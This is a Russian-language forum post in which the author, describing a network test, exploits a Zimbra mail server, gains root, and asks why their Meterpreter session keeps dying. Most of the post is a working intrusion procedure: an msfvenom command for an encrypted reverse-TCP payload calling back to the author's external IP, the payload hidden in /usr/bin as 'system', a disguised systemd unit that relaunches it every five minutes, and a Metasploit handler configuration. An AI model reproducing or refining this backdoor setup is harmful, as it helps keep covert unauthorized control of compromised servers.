Здравствуйте.Возник такая проблема с meterpreter Опишу ситуацию : Тестирую некую сеть . В одном из машин нашел уязвимый почтовый сервер Zimbra.Уязвимая машина стоит за nat/firewall а у меня машина стоит за роутером. Использовав эксплоит я сделал backconnect к своей машине с помощью nc. Успешно подключился. После этого получил привилегии root. Но для чтобы тестировать сеть мне нужно на этой взломанной машине закрепиться.Для этой цели я сделал следующее : Я сгенерировал payload в metasploit с помощью команды : msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=мой внешний ip LPORT=46852 --encrypt aes256 --encrypt-key encryptkey -f elf > /root/Desktop/system И после этого загрузил этот payload на машину.Положил payload в папку /usr/bin/ . Создал свой системный сервис с запуском payload-а каждые пят минут проделав следующее : 1)Создал файл system.service в директории /etc/systemd/system/ с таким содержанием : [Unit] Description=System Service [Service] ExecStart=/usr/bin/system Restart=always RestartSec=300 [Install] WantedBy=default.target 2) Набрал следующее в терминале : systemctl enable system.service systemctl start system.service Набрав systemctl --list=service и увидел что мой сервис успешно стартанул. После этого я оборвал соединение с nc. Набрал в Metasploit следующее : use exploit/multi/handler set payload payload/linux/x64/meterpreter_reverse_tcp set lhost мой внутренний ip (192.168.0.102 в Kali) set lport 46852 set ReverseListenerBindAddress 192.168.0.102 run Мой payload успешно подключился к моей машине.Но после некоторой работы на уязвимой машине или некоторого времени связь обрывается и сообщение : Meterpreter session died.Это происходит редко но все таки происходить. Ну я в этом случае открываю прослушку заново с параметрами выше при этом перезапустив и metasploit заново. На этот раз сообщение : Meterpreter session is not valid session and will closed. OC уязвимый машины :CentOS 7.9.2009 (Linux 3.10.0-1160.6.1.el7.x86_64) Так вот. Вопросы : 1) Почему обрывается связь ? Я посмотрел в опциях meterpreter там стоит SessionExpirationTimeout с значением 604800 . Из-за чего может произойти обрыв ? 2) Почему появляется ошибка "Meterpreter session is not valid session and will closed. " и сессия не устанавливаеться ? Что я сделал неправильно ? Интересно мне вот что : После ошибки "Meterpreter session is not valid session and will closed. " я заново эксплуатирую ошибку в zimbra ,повышаю права , убиваю процесс payload-a. И после этого payload успешно подключаеться к моей машине. Что нужно сделать в данной ситуации ? Спасибо за ответы.
